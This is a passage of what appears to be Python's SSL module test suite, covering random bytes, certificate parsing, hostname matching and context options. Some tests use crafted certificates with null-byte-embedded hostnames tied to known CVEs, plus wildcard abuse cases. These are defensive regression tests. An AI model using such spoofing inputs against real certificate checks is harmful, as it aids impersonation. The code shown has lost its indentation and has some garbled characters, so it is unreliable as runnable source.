self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
